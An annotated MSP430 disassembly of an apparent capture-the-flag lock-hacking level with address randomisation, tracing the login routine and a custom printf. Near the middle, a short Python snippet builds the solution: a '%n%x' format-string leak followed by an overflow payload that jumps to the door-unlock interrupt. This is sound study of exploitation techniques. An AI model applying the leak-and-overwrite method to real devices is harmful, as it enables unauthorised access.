.msp430
0010 <__trap_interrupt>
0010:  3041           ret

; Only runs once
4400 <__init_stack>
4400:  3140 0044      mov	#0x4400, sp
4404 <__low_level_init>
4404:  1542 5c01      mov	&0x015c, r5
4408:  75f3           and.b	#-0x1, r5
440a:  35d0 085a      bis	#0x5a08, r5
440e <__do_copy_data>
440e:  3f40 0000      clr	r15
4412:  0f93           tst	r15
4414:  0724           jz	$+0x10 <__do_clear_bss+0x0>
4416:  8245 5c01      mov	r5, &0x015c
441a:  2f83           decd	r15
; 4170 contains only zeroes
441c:  9f4f 704a 0024 mov	0x4a70(r15), 0x2400(r15)
4422:  f923           jnz	$-0xc <__do_copy_data+0x8>
4424 <__do_clear_bss>
4424:  3f40 3200      mov	#0x32, r15
4428:  0f93           tst	r15
442a:  0624           jz	$+0xe <main+0x0>
442c:  8245 5c01      mov	r5, &0x015c
4430:  1f83           dec	r15
4432:  cf43 0024      mov.b	#0x0, 0x2400(r15)
4436:  fa23           jnz	$-0xa <__do_clear_bss+0x8>

rand_base_0x038: <main>
main:
4438:  b012 1c4a      call	#0x4a1c <rand> ; get rand_base
443c:  0b4f           mov	r15, r11
443e:  3bf0 fe7f      and	#0x7ffe, r11
4442:  3b50 0060      add	#0x6000, r11
4446:  b012 1c4a      call	#0x4a1c <rand>
444a:  0a4f           mov	r15, r10
; Copy 0x1000 bytes from 0x4400 to rand_base
444c:  3012 0010      push	#0x1000
4450:  3012 0044      push	#0x4400
4454:  0b12           push	r11
4456:  b012 e849      call	#0x49e8 <_memcpy>
445a:  3150 0600      add	#0x6, sp

445e:  0f4a           mov	r10, r15
4460:  3ff0 fe0f      and	#0xffe, r15
4464:  0e4b           mov	r11, r14
4466:  0e8f           sub	r15, r14
4468:  3e50 00ff      add	#0xff00, r14
446c:  0d4b           mov	r11, r13
446e:  3d50 5c03      add	#0x35c, r13
4472:  014e           mov	r14, sp
4474:  0f4b           mov	r11, r15
4476:  8d12           call	r13

rand_base_0x078: <__stop_progExec__>
4478:  32d0 f000      bis	#0xf0, sr
447c:  fd3f           jmp	$-0x4 <__stop_progExec__+0x0>

rand_base_0x07e: <__ctors_end>
447e:  3040 6e4a      br	#0x4a6e <_unexpected_>

rand_base_0x082: <_aslr_main>
_aslr_main: ;! args: r15
push	r11
push	r10
; Eight more bytes on stack
sub	#0x8, sp
mov	r15, r12
add	#0x36a, r12
mov	r12, 0x2(sp)

clr	r14
__delete_code_loop:
mov.b	#0x0, 0x4400(r14)
inc	r14
cmp	#0x1000, r14
jnz	$-0xa <__delete_code_loop>

; "Username (8 char max):" -> 0x2402
mov.b	#0x55, &0x2402
mov.b	#0x73, &0x2403
mov.b	#0x65, &0x2404
mov.b	#0x72, &0x2405
mov.b	#0x6e, &0x2406
mov.b	#0x61, &0x2407
mov.b	#0x6d, &0x2408
mov.b	#0x65, &0x2409
mov.b	#0x20, &0x240a
mov.b	#0x28, &0x240b
mov.b	#0x38, &0x240c
mov.b	#0x20, &0x240d
mov.b	#0x63, &0x240e
mov.b	#0x68, &0x240f
mov.b	#0x61, &0x2410
mov.b	#0x72, &0x2411
mov.b	#0x20, &0x2412
mov.b	#0x6d, &0x2413
mov.b	#0x61, &0x2414
mov.b	#0x78, &0x2415
mov.b	#0x29, &0x2416
mov.b	#0x3a, &0x2417
mov.b	#0x0,  &0x2418
mov	#0x17, &0x2400
mov	#0x2402, r14
clr	r11
jmp	$+0x22 <print_uname_string>
; Print the uname string bytewise
__print_uname_string_l:
inc	r14
sxt	r13
push	r11
push	r13
push	r11
push	pc
push	sr
mov	r11, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp
print_uname_string:
mov.b	@r14, r13
tst.b	r13
jnz	$-0x24 <__print_uname_string_l>

; Print newline
__print_line_feed__1: ; putchar
clr	r14
mov	#0xa, r13
push	r14
push	r13
push	r14
push	pc
push	sr
mov	r14, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp

;* Print ">>"
__print_less_than__1: ; putchar
add	#0x34, r13
push	r14
push	r13
push	r14
push	pc
push	sr
mov	r14, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp
__print_less_than__2: ; putchar
push	r14
push	r13
push	r14
push	pc
push	sr
mov	r14, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp

;! Gets 8 bytes of user input -> &0x2426
__get_uname_string: ; getsn
mov	#0x8, r10
mov	#0x2426, r11
mov	#0x2, r13
push	r10
push	r11
push	r13
push	pc
push	sr
mov	r13, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10 ; INT (2, 0x2426, 0x8)
pop	sr
add	#0x8, sp


;   Calls r15+0x36a
mov.b	r14, &0x242e
push	r11
call	r12 ;! PRINTF???
incd	sp
mov	r11, r15

jmp	$+0x8 <clsb_a>
__clsb_a_loop:
mov.b	#0x0, 0x0(r15)
inc	r15
clsb_a:
cmp	#0x2432, r15
jnz	$-0xa <__clsb_a_loop>

;! "Password:" -> 0x2403
mov.b	#0xa,  &0x2402 ; length 10
mov.b	#0x50, &0x2403
mov.b	#0x61, &0x2404
mov.b	#0x73, &0x2405
mov.b	#0x73, &0x2406
mov.b	#0x77, &0x2407
mov.b	#0x6f, &0x2408
mov.b	#0x72, &0x2409
mov.b	#0x64, &0x240a
mov.b	#0x3a, &0x240b
mov.b	#0x0,  &0x240c
mov	#0x2402, r14   ; r14 = &length

; puts ("Password:")
clr	r12
jmp	$+0x22 <print_passwd_string>
__print_passwd_string:
inc	r14
sxt	r13
push	r12
push	r13
push	r12
push	pc
push	sr
mov	r12, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10       ; INT (0, r13)
pop	sr
add	#0x8, sp
print_passwd_string:
mov.b	@r14, r13
tst.b	r13
jnz	$-0x24 <__print_passwd_string>
clr	r14
mov	#0xa, r13
push	r14
push	r13
push	r14
push	pc
push	sr
mov	r14, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp

;! Get password from user -> STACK
__get_pass_string: ; getsn
mov	sp, r11
add	#0x4, r11
mov	#0x14, r12
mov	#0x2, r13
push	r12
push	r11
push	r13
push	pc
push	sr
mov	r13, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10       ; INT (2, )
0x2aa:
pop	sr
add	#0x8, sp

;! Check password with HSM-2
__check_password: ; conditional_unlock_door
add	#0x7c, r13
mov	sp, r12
push	r12
push	r11
push	r13
push	pc
push	sr
mov	r13, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp

; "Wrong!" -> 0x2402
mov.b	#0x57, &0x2402
mov.b	#0x72, &0x2403
mov.b	#0x6f, &0x2404
mov.b	#0x6e, &0x2405
mov.b	#0x67, &0x2406
mov.b	#0x21, &0x2407
mov.b	r14,   &0x2408   ; Hah, nice hint: r14 still 0
mov	#0x7,  &0x2400   ; length: 7

;* puts
mov	#0x2402, r13
jmp	$+0x22 <_aslr_main+0x2a2>
__print_wrong_string: ; puts ("Wrong!")
inc	r13
sxt	r12
push	r14
push	r12
push	r14
push	pc
push	sr
mov	r14, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp
print_wrong_string:
mov.b	@r13, r12
tst.b	r12
jnz	$-0x24 <_aslr_main+0x282>
; print newline
clr	r14
mov	#0xa, r13
push	r14
push	r13
push	r14
push	pc
push	sr
mov	r14, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp
mov	sp, r14

; r15 = ++r14
incd	r14
push	r14
pop	r15
4754:
add	#0x8, sp
pop	r10
pop	r11
ret


rand_base_0x35c: <aslr_main>
aslr_main:
475c:  0e4f           mov	r15, r14
475e:  3e50 8200      add	#0x82, r14
4762:  8e12           call	r14
; SR |= 0x00f0
4764:  32d0 f000      bis	#0xf0, sr
4768:  3041           ret


aslr_base_0x36a: <printf>
printf:
; Save registers
push	r11
push	r10
push	r9
push	r8
push	r7
push	r6
push	r4
; Create a new stack frame of 0xe bytes
mov	sp, r4
add	#0xe, r4

; Get the first argument
decd	sp
mov	0x2(r4), r10
mov	sp, -0x10(r4)
mov	r10, r15

clr	r14
jmp	$+0x18 <__target_1> +3a
inc	r15
cmp.b	#0x25, r13
jnz	$+0x10 <__target_1> +3a
cmp.b	@r15, r13
jnz	$+0x8  <__target_2> +36
__target_4:
inc	r15
clr	r13
jmp	$+0x4  <__target_3> +38
__target_2:
mov	#0x1, r13
add	r13, r14
__target_3:
mov.b	@r15, r13
tst.b	r13
jnz	$-0x1a <__target_4> +24
mov	r14, r15
add	r15, r15
incd	r15
sub	r15, sp
mov	sp, r11
mov	r4, r12
add	#0x4, r12
mov	sp, r15
clr	r13
jmp	$+0xc  <printf+0x5e>
mov	@r12, 0x0(r15)
inc	r13
incd	r15
incd	r12
cmp	r14, r13
jl	$-0xc <printf+0x54>
clr	r12
mov	#0x9, r6
mov	r12, r13
mov	#0x25, r7
jmp	$+0xf8 <printf+0x166>
inc	r10
cmp.b	#0x25, r15
jz	$+0x26 <printf+0x9c>
inc	r12

__target_1:
mov.b	r15, r14
sxt	r14
push	r13
push	r14
push	r13
push	pc
push	sr
mov	r13, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp
jmp	$+0xcc <printf+0x166>
mov.b	@r10, r14
cmp.b	r15, r14
jnz	$+0x22 <printf+0xc2>
inc	r12
push	r13
push	r7
push	r13
push	pc
push	sr
mov	r13, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp
jmp	$+0xa2 <printf+0x162>
cmp.b	#0x73, r14
jnz	$+0x32 <printf+0xf8>
mov	@r11, r14
clr	r8
jmp	$+0x24 <printf+0xf0>
inc	r12
inc	r14
sxt	r9
push	r8
push	r9
push	r8
push	pc
push	sr
mov	r8, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp
mov.b	@r14, r9
tst.b	r9
jnz	$-0x26 <printf+0xce>
jmp	$+0x6c <printf+0x162>
cmp.b	#0x78, r14
jnz	$+0x5a <printf+0x156>
mov	@r11, r14
mov	#0x4, r9
jmp	$+0x4a <printf+0x14c>
mov	r14, r15
swpb	r15
and	#0xff, r15
clrc
rrc	r15
rra	r15
rra	r15
rra	r15
cmp	r15, r6
jl	$+0xa <printf+0x122>
mov	r15, r8
add	#0x30, r8
jmp	$+0x8 <printf+0x128>
mov	r15, r8
add	#0x57, r8
push	r13
push	r8
push	r13
push	pc
push	sr
mov	r13, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
add	#0x8, sp
add	r14, r14
add	r14, r14
add	r14, r14
add	r14, r14
add	#-0x1, r9
cmp	#-0x1, r9
jnz	$-0x4c <printf+0x104>
add	#0x4, r12
jmp	$+0xe <printf+0x162>
cmp.b	#0x6e, r14
jnz	$+0x8 <printf+0x162>
mov	@r11, r15
mov	r12, 0x0(r15)
incd	r11
inc	r10
mov.b	@r10, r15
tst.b	r15
jnz	$-0xfa <printf+0x70>
mov	-0x10(r4), sp
incd	sp
pop	r4
pop	r6
pop	r7
pop	r8
pop	r9
pop	r10
pop	r11
ret

;;;
def bypass (printf_loc):
   aslr_base = printf_loc - 0x36a;
   print(b'%n%x'.hex())
   print(f"{b'AAAA1011'.hex()}{aslr_base+0x56c:x}7f7f{aslr_base+0x4f4:x}")
;;;

aslr_base_0x4ec: <_INT>
_INT:
48ec:  1e41 0200      mov	0x2(sp), r14
48f0:  0212           push	sr
48f2:  0f4e           mov	r14, r15
aslr_base_0x4f4:
48f4:  8f10           swpb	r15
48f6:  024f           mov	r15, sr
48f8:  32d0 0080      bis	#0x8000, sr
48fc:  b012 1000      call	#0x10
4900:  3241           pop	sr
4902:  3041           ret

aslr_base_0x504: <INT>
INT:
4904:  0c4f           mov	r15, r12
4906:  0d12           push	r13
4908:  0e12           push	r14
490a:  0c12           push	r12
490c:  0012           push	pc
490e:  0212           push	sr
4910:  0f4c           mov	r12, r15
4912:  8f10           swpb	r15
4914:  024f           mov	r15, sr
4916:  32d0 0080      bis	#0x8000, sr
491a:  b012 1000      call	#0x10
491e:  3241           pop	sr
4920:  3152           add	#0x8, sp
4922:  3041           ret

aslr_base_0x524: <putchar>
putchar:
4924:  0e4f           mov	r15, r14
4926:  0d43           clr	r13
4928:  0d12           push	r13
492a:  0e12           push	r14
492c:  0d12           push	r13
492e:  0012           push	pc
4930:  0212           push	sr
4932:  0f4d           mov	r13, r15
4934:  8f10           swpb	r15
4936:  024f           mov	r15, sr
4938:  32d0 0080      bis	#0x8000, sr
493c:  b012 1000      call	#0x10
4940:  3241           pop	sr
4942:  3152           add	#0x8, sp
4944:  0f4e           mov	r14, r15
4946:  3041           ret

aslr_base_0x548: <getchar>
getchar:
4948:  2183           decd	sp
494a:  0d43           clr	r13
494c:  1e43           mov	#0x1, r14
494e:  0c41           mov	sp, r12
4950:  0d12           push	r13
4952:  0c12           push	r12
4954:  0e12           push	r14
4956:  0012           push	pc
4958:  0212           push	sr
495a:  0f4e           mov	r14, r15
495c:  8f10           swpb	r15
495e:  024f           mov	r15, sr
4960:  32d0 0080      bis	#0x8000, sr
4964:  b012 1000      call	#0x10
4968:  3241           pop	sr
496a:  3152           add	#0x8, sp
496c:  6f41           mov.b	@sp, r15
496e:  8f11           sxt	r15
4970:  2153           incd	sp
4972:  3041           ret

aslr_base_0x574: <getsn>
getsn:
4974:  0d4f           mov	r15, r13
4976:  2c43           mov	#0x2, r12
4978:  0e12           push	r14
497a:  0d12           push	r13
497c:  0c12           push	r12
497e:  0012           push	pc
4980:  0212           push	sr
4982:  0f4c           mov	r12, r15
4984:  8f10           swpb	r15
4986:  024f           mov	r15, sr
4988:  32d0 0080      bis	#0x8000, sr
498c:  b012 1000      call	#0x10
4990:  3241           pop	sr
4992:  3152           add	#0x8, sp
4994:  3041           ret

aslr_base_0x596: <puts>
puts:
4996:  0e4f           mov	r15, r14
4998:  0c43           clr	r12
499a:  103c           jmp	$+0x22 <puts+0x26>
499c:  1e53           inc	r14
499e:  8d11           sxt	r13
49a0:  0c12           push	r12
49a2:  0d12           push	r13
49a4:  0c12           push	r12
49a6:  0012           push	pc
49a8:  0212           push	sr
49aa:  0f4c           mov	r12, r15
49ac:  8f10           swpb	r15
49ae:  024f           mov	r15, sr
49b0:  32d0 0080      bis	#0x8000, sr
49b4:  b012 1000      call	#0x10
49b8:  3241           pop	sr
49ba:  3152           add	#0x8, sp
49bc:  6d4e           mov.b	@r14, r13
49be:  4d93           tst.b	r13
49c0:  ed23           jnz	$-0x24 <puts+0x6>
49c2:  0e43           clr	r14
49c4:  3d40 0a00      mov	#0xa, r13
49c8:  0e12           push	r14
49ca:  0d12           push	r13
49cc:  0e12           push	r14
49ce:  0012           push	pc
49d0:  0212           push	sr
49d2:  0f4e           mov	r14, r15
49d4:  8f10           swpb	r15
49d6:  024f           mov	r15, sr
49d8:  32d0 0080      bis	#0x8000, sr
49dc:  b012 1000      call	#0x10
49e0:  3241           pop	sr
49e2:  3152           add	#0x8, sp
49e4:  0f4e           mov	r14, r15
49e6:  3041           ret

aslr_base_0x5e8: <_memcpy>
memcpy:
49e8:  1c41 0600      mov	0x6(sp), r12
49ec:  0f43           clr	r15
49ee:  093c           jmp	$+0x14 <_memcpy+0x1a>
49f0:  1e41 0200      mov	0x2(sp), r14
49f4:  0e5f           add	r15, r14
49f6:  1d41 0400      mov	0x4(sp), r13
49fa:  0d5f           add	r15, r13
49fc:  ee4d 0000      mov.b	@r13, 0x0(r14)
4a00:  1f53           inc	r15
4a02:  0f9c           cmp	r12, r15
4a04:  f523           jnz	$-0x14 <_memcpy+0x8>
4a06:  3041           ret

aslr_base_608: <_bzero>
bzero:
4a08:  0d43           clr	r13
4a0a:  053c           jmp	$+0xc <_bzero+0xe>
4a0c:  0c4f           mov	r15, r12
4a0e:  0c5d           add	r13, r12
4a10:  cc43 0000      mov.b	#0x0, 0x0(r12)
4a14:  1d53           inc	r13
4a16:  0d9e           cmp	r14, r13
4a18:  f923           jnz	$-0xc <_bzero+0x4>
4a1a:  3041           ret

aslr_base_0x61c: <rand>
rand:
4a1c:  0e43           clr	r14
4a1e:  3d40 2000      mov	#0x20, r13
4a22:  0e12           push	r14
4a24:  0e12           push	r14
4a26:  0d12           push	r13
4a28:  0012           push	pc
4a2a:  0212           push	sr
4a2c:  0f4d           mov	r13, r15
4a2e:  8f10           swpb	r15
4a30:  024f           mov	r15, sr
4a32:  32d0 0080      bis	#0x8000, sr
4a36:  b012 1000      call	#0x10
4a3a:  3241           pop	sr
4a3c:  3152           add	#0x8, sp
4a3e:  0f4f           mov	r15, r15
4a40:  3041           ret

aslr_base_0x642: <conditional_unlock_door>
conditional_unlock_door:
4a42:  2183           decd	sp
4a44:  0e4f           mov	r15, r14
4a46:  3d40 7e00      mov	#0x7e, r13
4a4a:  0c41           mov	sp, r12
4a4c:  0c12           push	r12
4a4e:  0e12           push	r14
4a50:  0d12           push	r13
4a52:  0012           push	pc
4a54:  0212           push	sr
4a56:  0f4d           mov	r13, r15
4a58:  8f10           swpb	r15
4a5a:  024f           mov	r15, sr
4a5c:  32d0 0080      bis	#0x8000, sr
4a60:  b012 1000      call	#0x10
4a64:  3241           pop	sr
4a66:  3152           add	#0x8, sp
4a68:  0f43           clr	r15
4a6a:  2153           incd	sp
4a6c:  3041           ret
4a6e <_unexpected_>
4a6e:  0013           reti	pc